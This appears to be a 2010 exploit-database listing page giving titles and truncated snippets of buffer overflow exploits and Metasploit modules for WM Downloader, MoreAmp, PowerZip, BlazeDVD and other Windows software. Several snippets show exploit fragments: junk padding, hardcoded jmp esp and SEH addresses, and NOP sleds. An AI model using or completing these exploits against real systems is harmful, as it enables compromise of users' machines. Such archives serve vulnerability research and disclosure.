iDefense Security Advisory 06.21.10: Multiple Vendor LibTIFF 3.9.2 Stack Buffer Overflow Vulnerability

iDefense Security Advisory 06.21.10 http://labs.idefense.com/intelligence/vulnerabilities/ Jun 21, 2010 I. BACKGROUND libTIFF is a free and popular image library that provides support for displaying and manipulating Tag Image File Format TIFF image data. This library is used by numerous...

UltraISO v9.3.6.2750 .mds .mdf Files Buffer Overflow PoC

Exploit for windows platform in category dos / poc ======================================================== UltraISO v9.3.6.2750 .mds .mdf Files Buffer Overflow PoC ======================================================== / DISCLAIMER THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND...

WM Downloader 2.9.2 - Local Stack Buffer Overflow

WM Downloader 2.9.2 - Local Stack Buffer Overflow !/usr/bin/perl WM Downloader 2.9.2 stack buffer overflow win sp3 By Madjix Dz8athotmaildotcom my $hd = "EXTM3U\n"; my $jnk="http://"."\x41" x 257 ; my $eip = "\x7B\x46\x86\x7C" ; 0x7C86467B jmp esp kernel 32 my $shellcode = "\x90" x 25; $shellcode...

WM Downloader 2.9.2 Stack Buffer Overflow

Exploit for windows platform in category local exploits ========================================= WM Downloader 2.9.2 Stack Buffer Overflow ========================================= !/usr/bin/perl WM Downloader 2.9.2 stack buffer overflow win sp3 By Madjix Dz8athotmaildotcom my $hd = "EXTM3U\n"; ...

WM Downloader 2.9.2 - Local Stack Buffer Overflow

!/usr/bin/perl WM Downloader 2.9.2 stack buffer overflow win sp3 By Madjix Dz8athotmaildotcom my $hd = "EXTM3U\n"; my $jnk="http://"."\x41" x 257 ; my $eip = "\x7B\x46\x86\x7C" ; 0x7C86467B jmp esp kernel 32 my $shellcode = "\x90" x 25; $shellcode = $shellcode...

MoreAmp Local Stack Buffer Overflow

Exploit Title : MoreAmp .maf local Stack Buffer Overflow SEH tested on windows xp SP 3 FR Author: MadjiX Special Greets:His0k4 where are you : Greets:Bibi-info , Silectovic , Volc4n0 my $file= "MadjiX.maf"; my $junk = "\x41" x 108 ; my $nseh = "\xeb\x06\x90\x90" ; my $seh = "\xE1\x5B\x82\xC4" ; m...

Sybase EAServer 5.2 - Remote Stack Buffer Overflow (Metasploit)

$Id: sybaseeaserver.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)

$Id: wincomlpdadmin.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)

$Id: netcat110nt.rb 9587 2010-06-22 23:57:05Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

CA BrightStor ArcServe - Media Service Stack Buffer Overflow (Metasploit)

$Id: mediasrvsunrpc.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

Asus Dpcproxy - Remote Buffer Overflow (Metasploit)

$Id: asusdpcproxyoverflow.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

Veritas Backup Exec Name Service - Remote Overflow (Metasploit)

$Id: nameservice.rb 9583 2010-06-22 19:11:05Z todb $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)

Exploit Title : MoreAmp .maf local Stack Buffer Overflow SEH tested on windows xp SP 3 FR Author: MadjiX Special Greets:His0k4 where are you : Greets:Bibi-info , Silectovic , Volc4n0 my $file= "MadjiX.maf"; my $junk = "\x41" x 108 ; my $nseh = "\xeb\x06\x90\x90" ; my $seh = "\xE1\x5B\x82\xC4" ; m...

MoreAmp (.maf) local Stack Buffer Overflow (SEH)

Exploit for windows platform in category local exploits ================================================ MoreAmp .maf local Stack Buffer Overflow SEH ================================================ Exploit Title : MoreAmp .maf local Stack Buffer Overflow SEH tested on windows xp SP 3 FR Author:...

Batch Audio Converter Lite Edition 1.0.0.0 Buffer Overflow

Exploit Title: Batch Audio Converter Lite Edition = v1.0.0.0 Stack Buffer Overflow SEH Date: 06/17/2010 Author: modpr0be Software Link: http://www.freesoftwaretoolbox.com/files/batchaudiosetup.exe Version: =1.0.0.0 0.4.0.0 tested and worked Tested on: Windows XP SP2 Type of Vuln: SEH CVE : N/A Co...

PowerZip 7.21 (Build 4010) Stack Buffer Overflow

Exploit for windows platform in category dos / poc ================================================ PowerZip 7.21 Build 4010 Stack Buffer Overflow ================================================ / DISCLAIMER THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSON...

PowerZip 7.21 (Build 4010) - Stack Buffer Overflow

PowerZip 7.21 Build 4010 - Stack Buffer Overflow / DISCLAIMER THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!! The programs are provided as is without any guarantees or warranty. The author is not responsible for any damage or losses of...

BlazeDVD 5.1 Stack Buffer Overflow With ASLR/DEP Bypass

!/usr/bin/python BlazeDVD v5.1 .plf Stack Buffer Overflow PoC exploit - ALSR/DEP bypass on win7 Author: mrme - https://net-ninja.net - mrmeATcorelan.be - @StevenSeeley Download: http://www.blazevideo.com/ Tested on windows 7 version N - DEP = AlwaysOn Greetz: Corelan Security Team...

Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow (SEH)

Batch Audio Converter Lite Edition 1.0.0.0 - Local Stack Buffer Overflow SEH Software Link: http://www.freesoftwaretoolbox.com/files/batchaudiosetup.exe Tested on: Windows XP SP2 Type of Vuln: SEH Code : bacon-exploit.py Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, dan wedus-wedus...

BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass

Exploit for windows platform in category local exploits ======================================================================== BlazeDVD v5.1 .plf Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass ======================================================================== !/usr/bin/python BlazeDV...